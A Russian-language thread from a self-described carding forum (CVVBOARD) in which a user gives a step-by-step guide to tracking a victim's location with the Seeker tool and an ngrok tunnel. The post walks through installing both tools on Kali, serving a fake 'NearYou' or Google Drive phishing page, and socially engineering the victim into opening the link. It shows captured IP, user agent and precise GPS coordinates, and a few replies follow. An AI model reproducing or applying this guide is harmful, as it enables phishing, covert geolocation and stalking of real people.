Привет, гость!

Добро пожаловать на CVVBOARD - крупнейший теневой кардинг форум. У нас Вы сможете найти огромное множество статей по теме кардинга и заработка в интернете. Актуальная информация, новости даркнета, сервисы от проверенных продавцов, эксклюзивные, только рабочие схемы заработка, ежедневные раздачи - все это Вы найдете на нашем форуме! Не пренебрегайте услугами Гарант-Сервиса это убережет Вас от мошенников. Обратите внимание, звание модератора не является гарантом в сделках!

Вычисляем местоположение c помощью Seeker

DiNo

Опытный user
Регистрация
10 Янв 2019
Сообщения
709
Реакции
56
Для деанонимизации достаточно использовать утилиту Seeker (местоположение, IP, OS, количество ядер процессора, CPU, GPU. браузер). Что это такое и с чем ее едят? Об этом ниже.

Как это работает?

Запускаем фишинговый сайт, скидываем его жертве, с помощью СИ заставляем перейти. Он переходит, мы получаем IP и т.д. Если даёт доступ к геолокации, то получаем точное месторасположение.

Нам нужно
Сам seeker + ngrok. Атаку произведем с Kali Linux.

Установка Seeker:


sudo apt update
sudo apt install python3 python3-pip php ssh git
pip3 install requests
git clone https://github.com/thewhiteh4t/seeker
cd seeker/
python3 ./seeker.py -h

Установка Ngrok:


wget `curl -s https://ngrok.com/download | grep -o -E 'https://bin.equinox.io/c/[A-Za-z0-9]{4,}/ngrok-stable-linux-amd64.zip'`
unzip ngrok-stable-linux-amd64.zip
chmod +x ./ngrok
./ngrok -h
Seeker
Запускаем seeker:


python3 ./seeker.py -t manual

191a71483b00651dd0052.png


Если при попытке запуска встроенного PHP сервера у вас возникли проблемы, то посмотрите содержимое файла ./logs/php.log.

На выбор присутствует два готовых шаблона:
[1] NearYou
[2] Google Drive

Выбираю первый.
Затем выводится информация:
[+] Starting PHP Server......[ Success ]
[+] Waiting for User Interaction...


9e042a15b7c159a81f56e.png


В ней говорят, что PHP сервер запущен и ожидается взаимодействие с пользователем. Идем дальше.
Для создания тоннеля из интернета до нашего локального сервера, в другом окне запускаем ngrok:


./ngrok http 8080

6725a040dc2363c6bf958.png


Получаем сгенерированную ссылку https://1fa595b3.ngrok.io.
Кидаем ее жертве. Если пользователь открыл ссылку на настольном компьютере, он увидит следующее:

627f58d3d4fe5ddf6f4f5.png


Страница выглядит весьма профессионально. Надписи говорят о том, что этот сервис позволяет найти людей рядом с вами и завести новых друзей. Допустим, пользователь нажал кнопку «Continue»:

9054b0b695bd829b4e697.png


Возникает запрос на доступ к местоположению.
В окне seeker мы видим следующее:

88c5e4dbab330dd0d6ec4.png


Мы получили IP и User Agent пользователя, но данные о местоположении не получены -- у компьютера нет GPS модуля:
[-] Location information is unavailable

Откроем теперь фишинговую ссылку на мобильном телефоне.

eceae4b1453b59cd69313.png


Запрос данных о местоположении:

34d04f8771e8874c44181.png


В этот раз получены данные локации:
[+] Location Information :

[+] Latitude : 12.458610728197513 deg
[+] Longitude : 99.97342079401619 deg
[+] Accuracy : 3.4233226776123047 m
[+] Altitude : 65.55902099609375
[+] Direction : Not Available
[+] Speed : 0.23704902827739716 m/s


d9e6ce02b76a310de99d0.png

Ссылка на гугл карты: https://www.google.com/maps/place/12.458610728197513+99.97342079401619
Также сказано, что данные сохранены в файл по пути ./seeker/db/results.csv.
 

mmqm

Опытный user
Регистрация
12 Сен 2017
Сообщения
63
Реакции
0
Спасибо
 

lalkek

Опытный user
Регистрация
29 Авг 2017
Сообщения
62
Реакции
0
Пробовал кто то ??
 

tommi50a

Опытный user
Регистрация
29 Авг 2017
Сообщения
77
Реакции
0
только на линукс?
 
Сверху Снизу